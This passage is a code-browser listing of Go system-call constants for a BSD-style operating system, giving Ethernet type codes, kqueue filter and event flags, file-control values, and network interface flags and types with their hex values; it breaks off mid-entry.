ETHERTYPE_EXPERDATA (line 369) | ETHERTYPE_EXPERDATA = 0x8049 constant ETHERTYPE_FLIP (line 370) | ETHERTYPE_FLIP = 0x8146 constant ETHERTYPE_FLOWCONTROL (line 371) | ETHERTYPE_FLOWCONTROL = 0x8808 constant ETHERTYPE_FRARP (line 372) | ETHERTYPE_FRARP = 0x808 constant ETHERTYPE_GENDYN (line 373) | ETHERTYPE_GENDYN = 0x8068 constant ETHERTYPE_HAYES (line 374) | ETHERTYPE_HAYES = 0x8130 constant ETHERTYPE_HIPPI_FP (line 375) | ETHERTYPE_HIPPI_FP = 0x8180 constant ETHERTYPE_HITACHI (line 376) | ETHERTYPE_HITACHI = 0x8820 constant ETHERTYPE_HP (line 377) | ETHERTYPE_HP = 0x8005 constant ETHERTYPE_IEEEPUP (line 378) | ETHERTYPE_IEEEPUP = 0xa00 constant ETHERTYPE_IEEEPUPAT (line 379) | ETHERTYPE_IEEEPUPAT = 0xa01 constant ETHERTYPE_IMLBL (line 380) | ETHERTYPE_IMLBL = 0x4c42 constant ETHERTYPE_IMLBLDIAG (line 381) | ETHERTYPE_IMLBLDIAG = 0x424c constant ETHERTYPE_IP (line 382) | ETHERTYPE_IP = 0x800 constant ETHERTYPE_IPAS (line 383) | ETHERTYPE_IPAS = 0x876c constant ETHERTYPE_IPV6 (line 384) | ETHERTYPE_IPV6 = 0x86dd constant ETHERTYPE_IPX (line 385) | ETHERTYPE_IPX = 0x8137 constant ETHERTYPE_IPXNEW (line 386) | ETHERTYPE_IPXNEW = 0x8037 constant ETHERTYPE_KALPANA (line 387) | ETHERTYPE_KALPANA = 0x8582 constant ETHERTYPE_LANBRIDGE (line 388) | ETHERTYPE_LANBRIDGE = 0x8038 constant ETHERTYPE_LANPROBE (line 389) | ETHERTYPE_LANPROBE = 0x8888 constant ETHERTYPE_LAT (line 390) | ETHERTYPE_LAT = 0x6004 constant ETHERTYPE_LBACK (line 391) | ETHERTYPE_LBACK = 0x9000 constant ETHERTYPE_LITTLE (line 392) | ETHERTYPE_LITTLE = 0x8060 constant ETHERTYPE_LLDP (line 393) | ETHERTYPE_LLDP = 0x88cc constant ETHERTYPE_LOGICRAFT (line 394) | ETHERTYPE_LOGICRAFT = 0x8148 constant ETHERTYPE_LOOPBACK (line 395) | ETHERTYPE_LOOPBACK = 0x9000 constant ETHERTYPE_MACSEC (line 396) | ETHERTYPE_MACSEC = 0x88e5 constant ETHERTYPE_MATRA (line 397) | ETHERTYPE_MATRA = 0x807a constant ETHERTYPE_MAX (line 398) | ETHERTYPE_MAX = 0xffff constant ETHERTYPE_MERIT (line 399) | ETHERTYPE_MERIT = 0x807c constant ETHERTYPE_MICP (line 400) | ETHERTYPE_MICP = 0x873a constant ETHERTYPE_MOPDL (line 401) | ETHERTYPE_MOPDL = 0x6001 constant ETHERTYPE_MOPRC (line 402) | ETHERTYPE_MOPRC = 0x6002 constant ETHERTYPE_MOTOROLA (line 403) | ETHERTYPE_MOTOROLA = 0x818d constant ETHERTYPE_MPLS (line 404) | ETHERTYPE_MPLS = 0x8847 constant ETHERTYPE_MPLS_MCAST (line 405) | ETHERTYPE_MPLS_MCAST = 0x8848 constant ETHERTYPE_MUMPS (line 406) | ETHERTYPE_MUMPS = 0x813f constant ETHERTYPE_NBPCC (line 407) | ETHERTYPE_NBPCC = 0x3c04 constant ETHERTYPE_NBPCLAIM (line 408) | ETHERTYPE_NBPCLAIM = 0x3c09 constant ETHERTYPE_NBPCLREQ (line 409) | ETHERTYPE_NBPCLREQ = 0x3c05 constant ETHERTYPE_NBPCLRSP (line 410) | ETHERTYPE_NBPCLRSP = 0x3c06 constant ETHERTYPE_NBPCREQ (line 411) | ETHERTYPE_NBPCREQ = 0x3c02 constant ETHERTYPE_NBPCRSP (line 412) | ETHERTYPE_NBPCRSP = 0x3c03 constant ETHERTYPE_NBPDG (line 413) | ETHERTYPE_NBPDG = 0x3c07 constant ETHERTYPE_NBPDGB (line 414) | ETHERTYPE_NBPDGB = 0x3c08 constant ETHERTYPE_NBPDLTE (line 415) | ETHERTYPE_NBPDLTE = 0x3c0a constant ETHERTYPE_NBPRAR (line 416) | ETHERTYPE_NBPRAR = 0x3c0c constant ETHERTYPE_NBPRAS (line 417) | ETHERTYPE_NBPRAS = 0x3c0b constant ETHERTYPE_NBPRST (line 418) | ETHERTYPE_NBPRST = 0x3c0d constant ETHERTYPE_NBPSCD (line 419) | ETHERTYPE_NBPSCD = 0x3c01 constant ETHERTYPE_NBPVCD (line 420) | ETHERTYPE_NBPVCD = 0x3c00 constant ETHERTYPE_NBS (line 421) | ETHERTYPE_NBS = 0x802 constant ETHERTYPE_NCD (line 422) | ETHERTYPE_NCD = 0x8149 constant ETHERTYPE_NESTAR (line 423) | ETHERTYPE_NESTAR = 0x8006 constant ETHERTYPE_NETBEUI (line 424) | ETHERTYPE_NETBEUI = 0x8191 constant ETHERTYPE_NHRP (line 425) | ETHERTYPE_NHRP = 0x2001 constant ETHERTYPE_NOVELL (line 426) | ETHERTYPE_NOVELL = 0x8138 constant ETHERTYPE_NS (line 427) | ETHERTYPE_NS = 0x600 constant ETHERTYPE_NSAT (line 428) | ETHERTYPE_NSAT = 0x601 constant ETHERTYPE_NSCOMPAT (line 429) | ETHERTYPE_NSCOMPAT = 0x807 constant ETHERTYPE_NSH (line 430) | ETHERTYPE_NSH = 0x984f constant ETHERTYPE_NTRAILER (line 431) | ETHERTYPE_NTRAILER = 0x10 constant ETHERTYPE_OS9 (line 432) | ETHERTYPE_OS9 = 0x7007 constant ETHERTYPE_OS9NET (line 433) | ETHERTYPE_OS9NET = 0x7009 constant ETHERTYPE_PACER (line 434) | ETHERTYPE_PACER = 0x80c6 constant ETHERTYPE_PBB (line 435) | ETHERTYPE_PBB = 0x88e7 constant ETHERTYPE_PCS (line 436) | ETHERTYPE_PCS = 0x4242 constant ETHERTYPE_PLANNING (line 437) | ETHERTYPE_PLANNING = 0x8044 constant ETHERTYPE_PPP (line 438) | ETHERTYPE_PPP = 0x880b constant ETHERTYPE_PPPOE (line 439) | ETHERTYPE_PPPOE = 0x8864 constant ETHERTYPE_PPPOEDISC (line 440) | ETHERTYPE_PPPOEDISC = 0x8863 constant ETHERTYPE_PRIMENTS (line 441) | ETHERTYPE_PRIMENTS = 0x7031 constant ETHERTYPE_PUP (line 442) | ETHERTYPE_PUP = 0x200 constant ETHERTYPE_PUPAT (line 443) | ETHERTYPE_PUPAT = 0x200 constant ETHERTYPE_QINQ (line 444) | ETHERTYPE_QINQ = 0x88a8 constant ETHERTYPE_RACAL (line 445) | ETHERTYPE_RACAL = 0x7030 constant ETHERTYPE_RATIONAL (line 446) | ETHERTYPE_RATIONAL = 0x8150 constant ETHERTYPE_RAWFR (line 447) | ETHERTYPE_RAWFR = 0x6559 constant ETHERTYPE_RCL (line 448) | ETHERTYPE_RCL = 0x1995 constant ETHERTYPE_RDP (line 449) | ETHERTYPE_RDP = 0x8739 constant ETHERTYPE_RETIX (line 450) | ETHERTYPE_RETIX = 0x80f2 constant ETHERTYPE_REVARP (line 451) | ETHERTYPE_REVARP = 0x8035 constant ETHERTYPE_SCA (line 452) | ETHERTYPE_SCA = 0x6007 constant ETHERTYPE_SECTRA (line 453) | ETHERTYPE_SECTRA = 0x86db constant ETHERTYPE_SECUREDATA (line 454) | ETHERTYPE_SECUREDATA = 0x876d constant ETHERTYPE_SGITW (line 455) | ETHERTYPE_SGITW = 0x817e constant ETHERTYPE_SG_BOUNCE (line 456) | ETHERTYPE_SG_BOUNCE = 0x8016 constant ETHERTYPE_SG_DIAG (line 457) | ETHERTYPE_SG_DIAG = 0x8013 constant ETHERTYPE_SG_NETGAMES (line 458) | ETHERTYPE_SG_NETGAMES = 0x8014 constant ETHERTYPE_SG_RESV (line 459) | ETHERTYPE_SG_RESV = 0x8015 constant ETHERTYPE_SIMNET (line 460) | ETHERTYPE_SIMNET = 0x5208 constant ETHERTYPE_SLOW (line 461) | ETHERTYPE_SLOW = 0x8809 constant ETHERTYPE_SNA (line 462) | ETHERTYPE_SNA = 0x80d5 constant ETHERTYPE_SNMP (line 463) | ETHERTYPE_SNMP = 0x814c constant ETHERTYPE_SONIX (line 464) | ETHERTYPE_SONIX = 0xfaf5 constant ETHERTYPE_SPIDER (line 465) | ETHERTYPE_SPIDER = 0x809f constant ETHERTYPE_SPRITE (line 466) | ETHERTYPE_SPRITE = 0x500 constant ETHERTYPE_STP (line 467) | ETHERTYPE_STP = 0x8181 constant ETHERTYPE_TALARIS (line 468) | ETHERTYPE_TALARIS = 0x812b constant ETHERTYPE_TALARISMC (line 469) | ETHERTYPE_TALARISMC = 0x852b constant ETHERTYPE_TCPCOMP (line 470) | ETHERTYPE_TCPCOMP = 0x876b constant ETHERTYPE_TCPSM (line 471) | ETHERTYPE_TCPSM = 0x9002 constant ETHERTYPE_TEC (line 472) | ETHERTYPE_TEC = 0x814f constant ETHERTYPE_TIGAN (line 473) | ETHERTYPE_TIGAN = 0x802f constant ETHERTYPE_TRAIL (line 474) | ETHERTYPE_TRAIL = 0x1000 constant ETHERTYPE_TRANSETHER (line 475) | ETHERTYPE_TRANSETHER = 0x6558 constant ETHERTYPE_TYMSHARE (line 476) | ETHERTYPE_TYMSHARE = 0x802e constant ETHERTYPE_UBBST (line 477) | ETHERTYPE_UBBST = 0x7005 constant ETHERTYPE_UBDEBUG (line 478) | ETHERTYPE_UBDEBUG = 0x900 constant ETHERTYPE_UBDIAGLOOP (line 479) | ETHERTYPE_UBDIAGLOOP = 0x7002 constant ETHERTYPE_UBDL (line 480) | ETHERTYPE_UBDL = 0x7000 constant ETHERTYPE_UBNIU (line 481) | ETHERTYPE_UBNIU = 0x7001 constant ETHERTYPE_UBNMC (line 482) | ETHERTYPE_UBNMC = 0x7003 constant ETHERTYPE_VALID (line 483) | ETHERTYPE_VALID = 0x1600 constant ETHERTYPE_VARIAN (line 484) | ETHERTYPE_VARIAN = 0x80dd constant ETHERTYPE_VAXELN (line 485) | ETHERTYPE_VAXELN = 0x803b constant ETHERTYPE_VEECO (line 486) | ETHERTYPE_VEECO = 0x8067 constant ETHERTYPE_VEXP (line 487) | ETHERTYPE_VEXP = 0x805b constant ETHERTYPE_VGLAB (line 488) | ETHERTYPE_VGLAB = 0x8131 constant ETHERTYPE_VINES (line 489) | ETHERTYPE_VINES = 0xbad constant ETHERTYPE_VINESECHO (line 490) | ETHERTYPE_VINESECHO = 0xbaf constant ETHERTYPE_VINESLOOP (line 491) | ETHERTYPE_VINESLOOP = 0xbae constant ETHERTYPE_VITAL (line 492) | ETHERTYPE_VITAL = 0xff00 constant ETHERTYPE_VLAN (line 493) | ETHERTYPE_VLAN = 0x8100 constant ETHERTYPE_VLTLMAN (line 494) | ETHERTYPE_VLTLMAN = 0x8080 constant ETHERTYPE_VPROD (line 495) | ETHERTYPE_VPROD = 0x805c constant ETHERTYPE_VURESERVED (line 496) | ETHERTYPE_VURESERVED = 0x8147 constant ETHERTYPE_WATERLOO (line 497) | ETHERTYPE_WATERLOO = 0x8130 constant ETHERTYPE_WELLFLEET (line 498) | ETHERTYPE_WELLFLEET = 0x8103 constant ETHERTYPE_X25 (line 499) | ETHERTYPE_X25 = 0x805 constant ETHERTYPE_X75 (line 500) | ETHERTYPE_X75 = 0x801 constant ETHERTYPE_XNSSM (line 501) | ETHERTYPE_XNSSM = 0x9001 constant ETHERTYPE_XTP (line 502) | ETHERTYPE_XTP = 0x817d constant ETHER_ADDR_LEN (line 503) | ETHER_ADDR_LEN = 0x6 constant ETHER_ALIGN (line 504) | ETHER_ALIGN = 0x2 constant ETHER_CRC_LEN (line 505) | ETHER_CRC_LEN = 0x4 constant ETHER_CRC_POLY_BE (line 506) | ETHER_CRC_POLY_BE = 0x4c11db6 constant ETHER_CRC_POLY_LE (line 507) | ETHER_CRC_POLY_LE = 0xedb88320 constant ETHER_HDR_LEN (line 508) | ETHER_HDR_LEN = 0xe constant ETHER_MAX_DIX_LEN (line 509) | ETHER_MAX_DIX_LEN = 0x600 constant ETHER_MAX_HARDMTU_LEN (line 510) | ETHER_MAX_HARDMTU_LEN = 0xff9b constant ETHER_MAX_LEN (line 511) | ETHER_MAX_LEN = 0x5ee constant ETHER_MIN_LEN (line 512) | ETHER_MIN_LEN = 0x40 constant ETHER_TYPE_LEN (line 513) | ETHER_TYPE_LEN = 0x2 constant ETHER_VLAN_ENCAP_LEN (line 514) | ETHER_VLAN_ENCAP_LEN = 0x4 constant EVFILT_AIO (line 515) | EVFILT_AIO = -0x3 constant EVFILT_DEVICE (line 516) | EVFILT_DEVICE = -0x8 constant EVFILT_EXCEPT (line 517) | EVFILT_EXCEPT = -0x9 constant EVFILT_PROC (line 518) | EVFILT_PROC = -0x5 constant EVFILT_READ (line 519) | EVFILT_READ = -0x1 constant EVFILT_SIGNAL (line 520) | EVFILT_SIGNAL = -0x6 constant EVFILT_SYSCOUNT (line 521) | EVFILT_SYSCOUNT = 0x9 constant EVFILT_TIMER (line 522) | EVFILT_TIMER = -0x7 constant EVFILT_VNODE (line 523) | EVFILT_VNODE = -0x4 constant EVFILT_WRITE (line 524) | EVFILT_WRITE = -0x2 constant EVL_ENCAPLEN (line 525) | EVL_ENCAPLEN = 0x4 constant EVL_PRIO_BITS (line 526) | EVL_PRIO_BITS = 0xd constant EVL_PRIO_MAX (line 527) | EVL_PRIO_MAX = 0x7 constant EVL_VLID_MASK (line 528) | EVL_VLID_MASK = 0xfff constant EVL_VLID_MAX (line 529) | EVL_VLID_MAX = 0xffe constant EVL_VLID_MIN (line 530) | EVL_VLID_MIN = 0x1 constant EVL_VLID_NULL (line 531) | EVL_VLID_NULL = 0x0 constant EV_ADD (line 532) | EV_ADD = 0x1 constant EV_CLEAR (line 533) | EV_CLEAR = 0x20 constant EV_DELETE (line 534) | EV_DELETE = 0x2 constant EV_DISABLE (line 535) | EV_DISABLE = 0x8 constant EV_DISPATCH (line 536) | EV_DISPATCH = 0x80 constant EV_ENABLE (line 537) | EV_ENABLE = 0x4 constant EV_EOF (line 538) | EV_EOF = 0x8000 constant EV_ERROR (line 539) | EV_ERROR = 0x4000 constant EV_FLAG1 (line 540) | EV_FLAG1 = 0x2000 constant EV_ONESHOT (line 541) | EV_ONESHOT = 0x10 constant EV_RECEIPT (line 542) | EV_RECEIPT = 0x40 constant EV_SYSFLAGS (line 543) | EV_SYSFLAGS = 0xf800 constant EXTA (line 544) | EXTA = 0x4b00 constant EXTB (line 545) | EXTB = 0x9600 constant EXTPROC (line 546) | EXTPROC = 0x800 constant FD_CLOEXEC (line 547) | FD_CLOEXEC = 0x1 constant FD_SETSIZE (line 548) | FD_SETSIZE = 0x400 constant FLUSHO (line 549) | FLUSHO = 0x800000 constant F_DUPFD (line 550) | F_DUPFD = 0x0 constant F_DUPFD_CLOEXEC (line 551) | F_DUPFD_CLOEXEC = 0xa constant F_GETFD (line 552) | F_GETFD = 0x1 constant F_GETFL (line 553) | F_GETFL = 0x3 constant F_GETLK (line 554) | F_GETLK = 0x7 constant F_GETOWN (line 555) | F_GETOWN = 0x5 constant F_ISATTY (line 556) | F_ISATTY = 0xb constant F_OK (line 557) | F_OK = 0x0 constant F_RDLCK (line 558) | F_RDLCK = 0x1 constant F_SETFD (line 559) | F_SETFD = 0x2 constant F_SETFL (line 560) | F_SETFL = 0x4 constant F_SETLK (line 561) | F_SETLK = 0x8 constant F_SETLKW (line 562) | F_SETLKW = 0x9 constant F_SETOWN (line 563) | F_SETOWN = 0x6 constant F_UNLCK (line 564) | F_UNLCK = 0x2 constant F_WRLCK (line 565) | F_WRLCK = 0x3 constant HUPCL (line 566) | HUPCL = 0x4000 constant HW_MACHINE (line 567) | HW_MACHINE = 0x1 constant ICANON (line 568) | ICANON = 0x100 constant ICMP6_FILTER (line 569) | ICMP6_FILTER = 0x12 constant ICRNL (line 570) | ICRNL = 0x100 constant IEXTEN (line 571) | IEXTEN = 0x400 constant IFAN_ARRIVAL (line 572) | IFAN_ARRIVAL = 0x0 constant IFAN_DEPARTURE (line 573) | IFAN_DEPARTURE = 0x1 constant IFF_ALLMULTI (line 574) | IFF_ALLMULTI = 0x200 constant IFF_BROADCAST (line 575) | IFF_BROADCAST = 0x2 constant IFF_CANTCHANGE (line 576) | IFF_CANTCHANGE = 0x8e52 constant IFF_DEBUG (line 577) | IFF_DEBUG = 0x4 constant IFF_LINK0 (line 578) | IFF_LINK0 = 0x1000 constant IFF_LINK1 (line 579) | IFF_LINK1 = 0x2000 constant IFF_LINK2 (line 580) | IFF_LINK2 = 0x4000 constant IFF_LOOPBACK (line 581) | IFF_LOOPBACK = 0x8 constant IFF_MULTICAST (line 582) | IFF_MULTICAST = 0x8000 constant IFF_NOARP (line 583) | IFF_NOARP = 0x80 constant IFF_OACTIVE (line 584) | IFF_OACTIVE = 0x400 constant IFF_POINTOPOINT (line 585) | IFF_POINTOPOINT = 0x10 constant IFF_PROMISC (line 586) | IFF_PROMISC = 0x100 constant IFF_RUNNING (line 587) | IFF_RUNNING = 0x40 constant IFF_SIMPLEX (line 588) | IFF_SIMPLEX = 0x800 constant IFF_STATICARP (line 589) | IFF_STATICARP = 0x20 constant IFF_UP (line 590) | IFF_UP = 0x1 constant IFNAMSIZ (line 591) | IFNAMSIZ = 0x10 constant IFT_1822 (line 592) | IFT_1822 = 0x2 constant IFT_A12MPPSWITCH (line 593) | IFT_A12MPPSWITCH = 0x82 constant IFT_AAL2 (line 594) | IFT_AAL2 = 0xbb constant IFT_AAL5 (line 595) | IFT_AAL5 = 0x31 constant IFT_ADSL (line 596) | IFT_ADSL = 0x5e constant IFT_AFLANE8023 (line 597) | IFT_AFLANE8023 = 0x3b constant IFT_AFLANE8025 (line 598) | IFT_AFLANE8025 = 0x3c constant IFT_ARAP (line 599) | IFT_ARAP = 0x58 constant IFT_ARCNET (line 600) | IFT_ARCNET = 0x23 constant IFT_ARCNETPLUS (line 601) | IFT_ARCNETPLUS = 0x24 constant IFT_ASYNC (line 602) | IFT_ASYNC = 0x54 constant IFT_ATM (line 603) | IFT_ATM = 0x25 constant IFT_ATMDXI (line 604) | IFT_ATMDXI = 0x69 constant IFT_ATMFUNI (line 605) | IFT_ATMFUNI = 0x6a constant IFT_ATMIMA (line 606) | IFT_ATMIMA = 0x6b constant IFT_ATMLOGICAL (line 607) | IFT_ATMLOGICAL = 0x50 constant IFT_ATMRADIO (line 608) | IFT_ATMRADIO = 0xbd constant IFT_ATMSUBINTERFACE (line 609) | IFT_ATMSUBINTERFACE = 0x86 constant IFT_ATMVCIENDPT (line 610) | IFT_ATMVCIENDPT = 0xc2 constant IFT_ATMVIRTUAL (line 611) | IFT_ATMVIRTUAL = 0x95 constant IFT_BGPPOLICYACCOUNTING (line 612) | IFT_BGPPOLICYACCOUNTING = 0xa2 constant IFT_BLUETOOTH (line 613) | IFT_BLUETOOTH = 0xf8 constant IFT_BRIDGE (line 614) | IFT_BRIDGE = 0xd1 constant IFT_BSC (line 615) | IFT_BSC = 0x53 constant IFT_CARP (line 616) | IFT_CARP = 0xf7 constant IFT_CCTEMUL (line 617) | IFT_CCTEMUL = 0x3d constant IFT_CEPT (line 618) | IFT_CEPT = 0x13 constant IFT_CES (line 619) | IFT_CES = 0x85 constant IFT_CHANNEL (line 620) | IFT_CHANNEL = 0x46 constant IFT_CNR (line 621) | IFT_CNR = 0x55 constant IFT_COFFEE (line 622) | IFT_COFFEE = 0x84 constant IFT_COMPOSITELINK (line 623) | IFT_COMPOSITELINK = 0x9b constant IFT_DCN (line 624) | IFT_DCN = 0x8d constant IFT_DIGITALPOWERLINE (line 625) | IFT_DIGITALPOWERLINE = 0x8a constant IFT_DIGITALWRAPPEROVERHEADCHANNEL (line 626) | IFT_DIGITALWRAPPEROVERHEADCHANNEL = 0xba constant IFT_DLSW (line 627) | IFT_DLSW = 0x4a constant IFT_DOCSCABLEDOWNSTREAM (line 628) | IFT_DOCSCABLEDOWNSTREAM = 0x80 constant IFT_DOCSCABLEMACLAYER (line 629) | IFT_DOCSCABLEMACLAYER = 0x7f constant IFT_DOCSCABLEUPSTREAM (line 630) | IFT_DOCSCABLEUPSTREAM = 0x81 constant IFT_DOCSCABLEUPSTREAMCHANNEL (line 631) | IFT_DOCSCABLEUPSTREAMCHANNEL = 0xcd constant IFT_DS0 (line 632) | IFT_DS0 = 0x51 constant IFT_DS0BUNDLE (line 633) | IFT_DS0BUNDLE = 0x52 constant IFT_DS1FDL (line 634) | IFT_DS1FDL = 0xaa constant IFT_DS3 (line 635) | IFT_DS3 = 0x1e constant IFT_DTM (line 636) | IFT_DTM = 0x8c constant IFT_DUMMY (line 637) | IFT_DUMMY = 0xf1 constant IFT_DVBASILN (line 638) | IFT_DVBASILN = 0xac constant IFT_DVBASIOUT (line 639) | IFT_DVBASIOUT = 0xad constant IFT_DVBRCCDOWNSTREAM (line 640) | IFT_DVBRCCDOWNSTREAM = 0x93 constant IFT_DVBRCCMACLAYER (line 641) | IFT_DVBRCCMACLAYER = 0x92 constant IFT_DVBRCCUPSTREAM (line 642) | IFT_DVBRCCUPSTREAM = 0x94 constant IFT_ECONET (line 643) | IFT_ECONET = 0xce constant IFT_ENC (line 644) | IFT_ENC = 0xf4 constant IFT_EON (line 645) | IFT_EON = 0x19 constant IFT_EPLRS (line 646) | IFT_EPLRS = 0x57 constant IFT_ESCON (line 647) | IFT_ESCON = 0x49 constant IFT_ETHER (line 648) | IFT_ETHER = 0x6 constant IFT_FAITH (line 649) | IFT_FAITH = 0xf3 constant IFT_FAST (line 650) | IFT_FAST = 0x7d constant IFT_FASTETHER (line 651) | IFT_FASTETHER = 0x3e constant IFT_FASTETHERFX (line 652) | IFT_FASTETHERFX = 0x45 constant IFT_FDDI (line 653) | IFT_FDDI = 0xf constant IFT_FIBRECHANNEL (line 654) | IFT_FIBRECHANNEL = 0x38 constant IFT_FRAMERELAYINTERCONNECT (line 655) | IFT_FRAMERELAYINTERCONNECT = 0x3a constant IFT_FRAMERELAYMPI (line 656) | IFT_FRAMERELAYMPI = 0x5c constant IFT_FRDLCIENDPT (line 657) | IFT_FRDLCIENDPT = 0xc1 constant IFT_FRELAY (line 658) | IFT_FRELAY = 0x20 constant IFT_FRELAYDCE (line 659) | IFT_FRELAYDCE = 0x2c constant IFT_FRF16MFRBUNDLE (line 660) | IFT_FRF16MFRBUNDLE = 0xa3 constant IFT_FRFORWARD (line 661) | IFT_FRFORWARD = 0x9e constant IFT_G703AT2MB (line 662) | IFT_G703AT2MB = 0x43 constant IFT_G703AT64K (line 663) | IFT_G703AT64K = 0x42 constant IFT_GIF (line 664) | IFT_GIF = 0xf0 constant IFT_GIGABITETHERNET (line 665) | IFT_GIGABITETHERNET = 0x75 constant IFT_GR303IDT (line 666) | IFT_GR303IDT = 0xb2 constant IFT_GR303RDT (line 667) | IFT_GR303RDT = 0xb1 constant IFT_H323GATEKEEPER (line 668) | IFT_H323GATEKEEPER = 0xa4 constant IFT_H323PROXY (line 669) | IFT_H323PROXY = 0xa5 constant IFT_HDH1822 (line 670) | IFT_HDH1822 = 0x3 constant IFT_HDLC (line 671) | IFT_HDLC = 0x76 constant IFT_HDSL2 (line 672) | IFT_HDSL2 = 0xa8 constant IFT_HIPERLAN2 (line 673) | IFT_HIPERLAN2 = 0xb7 constant IFT_HIPPI (line 674) | IFT_HIPPI = 0x2f constant IFT_HIPPIINTERFACE (line 675) | IFT_HIPPIINTERFACE = 0x39 constant IFT_HOSTPAD (line 676) | IFT_HOSTPAD = 0x5a constant IFT_HSSI (line 677) | IFT_HSSI = 0x2e constant IFT_HY (line 678) | IFT_HY = 0xe constant IFT_IBM370PARCHAN (line 679) | IFT_IBM370PARCHAN = 0x48 constant IFT_IDSL (line 680) | IFT_IDSL = 0x9a constant IFT_IEEE1394 (line 681) | IFT_IEEE1394 = 0x90 constant IFT_IEEE80211 (line 682) | IFT_IEEE80211 = 0x47 constant IFT_IEEE80212 (line 683) | IFT_IEEE80212 = 0x37 constant IFT_IEEE8023ADLAG (line 684) | IFT_IEEE8023ADLAG = 0xa1 constant IFT_IFGSN (line 685) | IFT_IFGSN = 0x91 constant IFT_IMT (line 686) | IFT_IMT = 0xbe constant IFT_INFINIBAND (line 687) | IFT_INFINIBAND = 0xc7 constant IFT_INTERLEAVE (line 688) | IFT_INTERLEAVE = 0x7c constant IFT_IP (line 689) | IFT_IP = 0x7e constant IFT_IPFORWARD (line 690) | IFT_IPFORWARD = 0x8e constant IFT_IPOVERATM (line 691) | IFT_IPOVERATM = 0x72 constant IFT_IPOVERCDLC (line 692) | IFT_IPOVERCDLC = 0x6d constant IFT_IPOVERCLAW (line 693) | IFT_IPOVERCLAW = 0x6e constant IFT_IPSWITCH (line 694) | IFT_IPSWITCH = 0x4e constant IFT_ISDN (line 695) | IFT_ISDN = 0x3f constant IFT_ISDNBASIC (line 696) | IFT_ISDNBASIC = 0x14 constant IFT_ISDNPRIMARY (line 697) | IFT_ISDNPRIMARY = 0x15 constant IFT_ISDNS (line 698) | IFT_ISDNS = 0x4b constant IFT_ISDNU (line 699) | IFT_ISDNU = 0x4c constant IFT_ISO88022LLC (line 700) | IFT_ISO88022LLC = 0x29 constant IFT_ISO88023 (line 701) | IFT_ISO88023 = 0x7 constant IFT_ISO88024 (line 702) | IFT_ISO88024 = 0x8 constant IFT_ISO88025 (line 703) | IFT_ISO88025 = 0x9 constant IFT_ISO88025CRFPINT (line 704) | IFT_ISO88025CRFPINT = 0x62 constant IFT_ISO88025DTR (line 705) | IFT_ISO88025DTR = 0x56 constant IFT_ISO88025FIBER (line 706) | IFT_ISO88025FIBER = 0x73 constant IFT_ISO88026 (line 707) | IFT_ISO88026 = 0xa constant IFT_ISUP (line 708) | IFT_ISUP = 0xb3 constant IFT_L2VLAN (line 709) | IFT_L2VLAN = 0x87 constant IFT_L3IPVLAN (line 710) | IFT_L3IPVLAN = 0x88 constant IFT_L3IPXVLAN (line 711) | IFT_L3IPXVLAN = 0x89 constant IFT_LAPB (line 712) | IFT_LAPB = 0x10 constant IFT_LAPD (line 713) | IFT_LAPD = 0x4d constant IFT_LAPF (line 714) | IFT_LAPF = 0x77 constant IFT_LINEGROUP (line 715) | IFT_LINEGROUP = 0xd2 constant IFT_LOCALTALK (line 716) | IFT_LOCALTALK = 0x2a constant IFT_LOOP (line 717) | IFT_LOOP = 0x18 constant IFT_MBIM (line 718) | IFT_MBIM = 0xfa constant IFT_MEDIAMAILOVERIP (line 719) | IFT_MEDIAMAILOVERIP = 0x8b constant IFT_MFSIGLINK (line 720) | IFT_MFSIGLINK = 0xa7 constant IFT_MIOX25 (line 721) | IFT_MIOX25 = 0x26 constant IFT_MODEM (line 722) | IFT_MODEM = 0x30 constant IFT_MPC (line 723) | IFT_MPC = 0x71 constant IFT_MPLS (line 724) | IFT_MPLS = 0xa6 constant IFT_MPLSTUNNEL (line 725) | IFT_MPLSTUNNEL = 0x96 constant IFT_MSDSL (line 726) | IFT_MSDSL = 0x8f constant IFT_MVL (line 727) | IFT_MVL = 0xbf constant IFT_MYRINET (line 728) | IFT_MYRINET = 0x63 constant IFT_NFAS (line 729) | IFT_NFAS = 0xaf constant IFT_NSIP (line 730) | IFT_NSIP = 0x1b constant IFT_OPTICALCHANNEL (line 731) | IFT_OPTICALCHANNEL = 0xc3 constant IFT_OPTICALTRANSPORT (line 732) | IFT_OPTICALTRANSPORT = 0xc4 constant IFT_OTHER (line 733) | IFT_OTHER = 0x1 constant IFT_P10 (line 734) | IFT_P10 = 0xc constant IFT_P80 (line 735) | IFT_P80 = 0xd constant IFT_PARA (line 736) | IFT_PARA = 0x22 constant IFT_PFLOG (line 737) | IFT_PFLOG = 0xf5 constant IFT_PFLOW (line 738) | IFT_PFLOW = 0xf9 constant IFT_PFSYNC (line 739) | IFT_PFSYNC = 0xf6 constant IFT_PLC (line 740) | IFT_PLC = 0xae constant IFT_PON155 (line 741) | IFT_PON155 = 0xcf constant IFT_PON622 (line 742) | IFT_PON622 = 0xd0 constant IFT_POS (line 743) | IFT_POS = 0xab constant IFT_PPP (line 744) | IFT_PPP = 0x17 constant IFT_PPPMULTILINKBUNDLE (line 745) | IFT_PPPMULTILINKBUNDLE = 0x6c constant IFT_PROPATM (line 746) | IFT_PROPATM = 0xc5 constant IFT_PROPBWAP2MP (line 747) | IFT_PROPBWAP2MP = 0xb8 constant IFT_PROPCNLS (line 748) | IFT_PROPCNLS = 0x59 constant IFT_PROPDOCSWIRELESSDOWNSTREAM (line 749) | IFT_PROPDOCSWIRELESSDOWNSTREAM = 0xb5 constant IFT_PROPDOCSWIRELESSMACLAYER (line 750) | IFT_PROPDOCSWIRELESSMACLAYER = 0xb4 constant IFT_PROPDOCSWIRELESSUPSTREAM (line 751) | IFT_PROPDOCSWIRELESSUPSTREAM = 0xb6 constant IFT_PROPMUX (line 752) | IFT_PROPMUX = 0x36 constant IFT_PROPVIRTUAL (line 753) | IFT_PROPVIRTUAL = 0x35 constant IFT_PROPWIRELESSP2P (line 754) | IFT_PROPWIRELESSP2P = 0x9d constant IFT_PTPSERIAL (line 755) | IFT_PTPSERIAL = 0x16 constant IFT_PVC (line 756) | IFT_PVC = 0xf2 constant IFT_Q2931 (line 757) | IFT_Q2931 = 0xc9 constant IFT_QLLC (line 758) | IFT_QLLC = 0x44 constant IFT_RADIOMAC (line 759) | IFT_RADIOMAC = 0xbc constant IFT_RADSL (line 760) | IFT_RADSL = 0x5f constant IFT_REACHDSL (line 761) | IFT_REACHDSL = 0xc0 constant IFT_RFC1483 (line 762) | IFT_RFC1483 = 0x9f constant IFT_RS232 (line 763) | IFT_RS232 = 0x21 constant IFT_RSRB (line 764) | IFT_RSRB = 0x4f constant IFT_SDLC (line 765) | IFT_SDLC 